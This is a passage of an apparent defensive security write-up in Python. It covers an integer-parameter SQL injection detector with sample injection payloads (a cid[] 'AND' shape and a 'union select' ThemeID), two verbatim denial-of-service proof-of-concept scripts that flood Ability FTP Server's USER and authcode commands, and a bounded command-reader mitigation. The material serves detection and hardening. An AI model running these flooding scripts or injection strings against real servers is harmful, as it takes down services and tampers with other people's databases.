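def check_integer_params(query_string, integer_params=INTEGER_PARAMS):
    """Return (param, decoded_value) pairs whose value is not a plain integer.

    parse_qs URL-decodes names and values, so cid%5B%5D becomes cid[] and an
    encoded ' AND (' sequence is compared in its decoded form. An empty list
    means every watched parameter can be cast with int() safely."""
    findings = []
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if name not in integer_params:
            continue
        for value in values:
            if not _INT_RE.match(value.strip()):
                findings.append((name, value))
    return findings


def safe_in_clause(values):
    """Build 'id IN (?, ?, ...)' with one placeholder per id.

    The vulnerable publish() did implode(',', $cid) straight into the query.
    Rejecting anything that is not an integer, then binding the integers as
    parameters, is the fix. Returns (sql_fragment, bound_ints) or raises."""
    ints = []
    for v in values:
        if not _INT_RE.match(str(v).strip()):
            raise ValueError("non-integer id rejected: %r" % (v,))
        ints.append(int(v))
    if not ints:
        raise ValueError("empty id list")
    return "id IN (%s)" % ", ".join("?" for _ in ints), ints


def scan_requests(requests):
    """Apply the check to (method, url, body) tuples; return the flagged ones
    as (method, url, findings). Body and query string are checked together."""
    flagged = []
    for method, url, body in requests:
        qs = urlsplit(url).query
        if body:
            qs = qs + "&" + body if qs else body
        hits = check_integer_params(qs)
        if hits:
            flagged.append((method, url, hits))
    return flagged


# Constructed sample traffic (not from the advisories): a benign unpublish,
# the cid[] injection shape, a benign theme lookup and the ThemeID union shape.
SAMPLE_REQUESTS = [
    ("POST", "/index.php?option=com_jem&view=myevents&Itemid=151",
     "filter=1&cid%5B%5D=1&cid%5B%5D=2&task=myevents.unpublish"),
    ("POST", "/index.php?option=com_jem&view=myevents&Itemid=151",
     "filter=1&cid%5B%5D=1,2)%20AND%20(1=1&task=myevents.unpublish"),
    ("GET", "/index.php?option=com_memorix&task=result&ThemeID=60", ""),
    ("GET", "/index.php?option=com_memorix&task=result&ThemeID=-8594+union+select+1,2,3", ""),
]

if __name__ == "__main__":
    for method, url, hits in scan_requests(SAMPLE_REQUESTS):
        print("FLAGGED", method, url, hits)
    print(safe_in_clause(["1", "2", "3"]))
```

The check is deliberately an allow-list (a value is either an integer or it is rejected) rather than a search for SQL keywords; keyword matching is what encoded and comment-split payloads are built to evade, whereas an integer key has exactly one legitimate shape.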
#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#

import socket
import sys
import os


def clear():
    os.system("cls")


def banner():
    print "############################################".center(80)
    print "#       Ability FTP Server DoS PoC         #".center(80)
    print "#             Author: St0rn                #".center(80)
    print "#   <fabien[at]anbu-pentest[dot]com>       #".center(80)
    print "############################################".center(80)


def createconn(ip):
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((ip,21))
    except:
        print "\n"
        print "[+] Server Down!".center(80)
        sys.exit(0)
    return s


def crash(sock):
    try:
        while 1:
            sock.send('USER '+'a'*99999)
            sys.stdout.write('.')
    except:
        sock.close()


############### Main ###############
clear()
banner()
if len(sys.argv)==2:
    print "\n"
    print "Waiting 2 or 3 minutes before crash".center(80)
    print "(The server can be run without afsloader.exe)".center(80)
    while 1:
        s=createconn(sys.argv[1])
        crash(s)
else:
    print "\n"
    print "Usage: AftpDos.py [Server IP]".center(80)
    sys.exit(0)
#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#

import socket
import sys
import os


def clear():
    os.system("cls")


def banner():
    print "############################################".center(80)
    print "#    Ability FTP Server Admin panel DoS    #".center(80)
    print "#             Author: St0rn                #".center(80)
    print "#   <fabien[at]anbu-pentest[dot]com>       #".center(80)
    print "############################################".center(80)


def createconn(ip):
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((ip,7200))
    except:
        print "\n"
        print "[+] Server Down!".center(80)
        sys.exit(0)
    return s


def crash(sock):
    try:
        while 1:
            sock.send('authcode '+'a'*99999)
            sys.stdout.write('.')
    except:
        sock.close()


############### Main ###############
clear()
banner()
if len(sys.argv)==2:
    print "\n"
    print "Waiting before crash".center(80)
    print "(The server can be run without afsloader.exe)".center(80)
    while 1:
        s=createconn(sys.argv[1])
        crash(s)
else:
    print "\n"
    print "Usage: AftpAdminDos.py [Server IP]".center(80)
    sys.exit(0)
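Both Ability FTP Server PoCs above have the same shape: a legitimate verb (USER on port 21, authcode on the admin port 7200) followed by roughly 100 KB of filler, sent in a loop until the service stops responding. The receiving-side mitigation is the same for both: cap the length of a command line before it is buffered or parsed, apply a per-verb argument limit, and drop the connection when the line cap is exceeded. The code below is an added example of that bounded reader, not Ability FTP Server's code; MAX_LINE, the MAX_ARG caps, the event tuples and the SAMPLE_SESSION bytes are all assumptions constructed for it.

```python
import io

# Caps are assumptions for this example. RFC 959 commands are short, so a
# line limit in the hundreds of bytes does not break legitimate clients.
MAX_LINE = 512
MAX_ARG = {"USER": 128, "PASS": 128, "AUTHCODE": 64}


class CommandTooLong(Exception):
    """Raised when a line or a verb argument exceeds its cap."""


def read_command_line(stream, max_line=MAX_LINE):
    """Read one CRLF-terminated command without ever buffering more than
    max_line bytes of it.

    readline(limit) stops after `limit` bytes whether or not a newline was
    seen, so an oversized line is detected after max_line + 2 bytes instead
    of after the peer decides to stop sending. Returns the line without its
    terminator, None at EOF (or a short unterminated tail on close), and
    raises CommandTooLong when the cap is hit."""
    line = stream.readline(max_line + 2)        # +2 leaves room for CRLF
    if not line:
        return None
    if not line.endswith(b"\n"):
        if len(line) >= max_line + 2:
            raise CommandTooLong("line exceeds %d bytes" % max_line)
        return None                             # peer closed mid-line
    return line.rstrip(b"\r\n")


def parse_command(line, max_arg=MAX_ARG):
    """Split 'VERB argument' and enforce the per-verb argument cap.

    Returns (verb, argument_bytes); raises CommandTooLong when the argument
    of a capped verb is longer than allowed, so the caller can answer with a
    5xx reply instead of copying the argument anywhere."""
    parts = line.split(b" ", 1)
    verb = parts[0].upper().decode("ascii", "replace")
    arg = parts[1] if len(parts) > 1 else b""
    cap = max_arg.get(verb)
    if cap is not None and len(arg) > cap:
        raise CommandTooLong("%s argument exceeds %d bytes" % (verb, cap))
    return verb, arg


def serve_session(stream, max_line=MAX_LINE):
    """Consume commands from a binary stream until EOF.

    Returns the list of events a server loop would act on:
      ("ok", verb, arg)   accepted command
      ("reject", why)     argument too long; reply 5xx, keep the connection
      ("drop", why)       line too long; close the connection and stop"""
    events = []
    while True:
        try:
            line = read_command_line(stream, max_line)
        except CommandTooLong as exc:
            events.append(("drop", str(exc)))
            return events
        if line is None:
            return events
        try:
            verb, arg = parse_command(line)
        except CommandTooLong as exc:
            events.append(("reject", str(exc)))
            continue
        events.append(("ok", verb, arg))


# Constructed session (not captured traffic): a normal login, then the
# oversized USER line the PoC sends, then a command that is never reached.
SAMPLE_SESSION = (
    b"USER alice\r\n"
    b"PASS s3cret\r\n"
    b"USER " + b"a" * 99999 + b"\r\n"
    b"PASS never-reached\r\n"
)


def run_sample():
    """Feed the constructed session through the bounded reader."""
    return serve_session(io.BytesIO(SAMPLE_SESSION))


if __name__ == "__main__":
    for event in run_sample():
        print(event)
```

Dropping the connection on an oversized line (rather than discarding the line and continuing) matters for the loop in the PoCs: a server that keeps reading would still spend its time draining 100 KB per iteration, while one that closes the socket forces the sender back to a fresh connect for every attempt.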